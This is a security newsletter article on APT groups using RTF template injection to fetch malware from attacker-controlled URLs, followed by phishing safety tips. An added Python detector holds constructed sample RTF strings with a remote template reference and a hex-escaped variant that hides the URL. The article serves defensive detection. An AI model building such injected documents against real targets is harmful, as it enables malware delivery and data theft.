New Attack Method Makes Malware Injection A Breeze For APT Groups

Published January 21, 2022 in our Security Fraud News & Alerts newsletter.



Nation-state threat actors from Russia, China, and India are now using an easier way to launch malware phishing attacks against other nations, according to researchers at Proofpoint. The level of success and ease these APT (advanced persistent threat) groups now have with an injection technique that infects PCs is troubling. Proofpoint finds that the RTF injection technique used by these nation-state groups easily spreads malware and steals information from other governments. If there’s a new winner in the “Power Email Phishing Attack” category, this may be it.


RTF (Rich Text Format) templates are a frequently used feature for creating documents in Microsoft Office, especially for Word files. The attackers alter the RTF file’s document-formatting properties so that it retrieves content from a URL they control, allowing them to remotely install malware on a target’s device. Injected RTF files are also difficult for anti-virus software to detect because the file type is so commonly used: most organizations allow RTFs by default, which makes anti-virus solutions ineffective against them.
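To show what the detection side of this looks like, here is an added example (editor-supplied code, not Proofpoint’s research tooling or anything from the newsletter) that scans RTF bytes for a template reference pointing at a remote location. It relies on the standard RTF control word `\*\template`, which Word honors as the document’s attached template; the three sample RTF strings and the `example.invalid` URLs are constructed for the demo and are not real samples.

```python
import re
from typing import List

# Constructed sample RTF bodies (not real malware; URLs use the reserved
# example.invalid domain).  The first is a plain document, the second
# carries a remote template reference, the third hides the URL behind
# RTF hex escapes (\'xx) so a naive "http" string search would miss it.
BENIGN_RTF = rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}\f0 Quarterly report text.\par}"
INJECTED_RTF = (
    rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}"
    rb"{\*\template http://example.invalid/tpl.dotm}"
    rb"\f0 Quarterly report text.\par}"
)
HEX_ESCAPED_RTF = rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70://example.invalid/t.dotm}\par}"

# A destination group of the form {\*\template <target>}.  The group ends at
# the first closing brace, which a URL or UNC path never contains.
TEMPLATE_GROUP = re.compile(rb"\{\\\*\\template\s*(.*?)\}", re.DOTALL)

# Targets we treat as remote: http(s)/ftp URLs and UNC paths (\\server\share).
REMOTE_TARGET = re.compile(rb"^(?:https?://|ftp://|\\\\)", re.IGNORECASE)


def decode_rtf_hex_escapes(data: bytes) -> bytes:
    """Replace RTF \\'xx hex escapes with the byte they encode."""
    return re.sub(
        rb"\\'([0-9a-fA-F]{2})",
        lambda m: bytes([int(m.group(1), 16)]),
        data,
    )


def find_remote_templates(rtf: bytes) -> List[str]:
    """Return every remote template target referenced by an RTF document.

    Non-RTF input yields an empty list rather than an error so the function
    can be run over a mixed attachment queue.
    """
    if not rtf.lstrip().startswith(b"{\\rtf"):
        return []
    hits = []
    for match in TEMPLATE_GROUP.finditer(rtf):
        target = decode_rtf_hex_escapes(match.group(1)).strip()
        if REMOTE_TARGET.match(target):
            hits.append(target.decode("latin-1", errors="replace"))
    return hits


def is_suspicious_rtf(rtf: bytes) -> bool:
    """True when the document pulls its template from a remote location."""
    return bool(find_remote_templates(rtf))


if __name__ == "__main__":
    for name, sample in [("benign", BENIGN_RTF),
                         ("injected", INJECTED_RTF),
                         ("hex-escaped", HEX_ESCAPED_RTF)]:
        print(f"{name:12s} suspicious={is_suspicious_rtf(sample)} "
              f"targets={find_remote_templates(sample)}")
```

A local template path (for example one under the user’s profile) is deliberately not flagged, because that is how ordinary Word documents reference their templates; the signal here is an attachment that reaches out over the network before the user has even seen its content. The hex-escape decoding covers the simplest way a URL can be hidden inside RTF, but other encodings exist, so a scanner like this is a cheap first-pass check for a mail gateway or triage script rather than a substitute for detonating the attachment in a sandbox.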



Just One Click…


According to Graphus, 48% of malicious attachments are Microsoft Office files, 94% of malware is delivered via email, and 80% of reported security incidents are linked to phishing attacks. Tessian reports that globally, nearly two million malicious emails passed typical email security defenses in just 12 months, from July 2020 to July 2021.


Not long ago, only certain file types such as .exe, .doc, and .xls were used to carry malware. Over time, other types were added to the watch list, like .pdf and .zip. One thing these highly successful RTF attacks show is that any file type can be weaponized.


Remember, it only takes one wrong click to unleash malware and compromise an entire network. Knowing the red flags of email phishing can keep a user from opening a suspicious message. Ultimately, the safest thing to do with a questionable email is to report it to your IT department or delete it.


Email Phishing Security Tips

  • Think before you click. Phishing emails carry malware attachments and malicious links in the message, and acting on them can be the first step to installing malware on a system.

  • Never open email attachments, especially when they’re unexpected. Instead, directly verify the sender is a trusted source. It’s as simple as making a phone call.

  • Be aware of generic greetings, bad spelling or grammar in an email, as well as bad graphics such as a fuzzy company logo. A legitimate email shouldn’t have typos, poor grammar, or questionable graphics.

  • Look for any sense of urgency in an email. Hackers like to push us into acting quickly before there’s time to verify the email is legitimate.

  • Keep all software updated, especially the operating system, anti-virus, and apps. Updates typically contain fixes for security bugs that leave all types of software and devices open to attack.


Keep up to date: Sign up for our Fraud alerts and Updates newsletter

Want to schedule a conversation? Please email us at advisor@nadicent.com
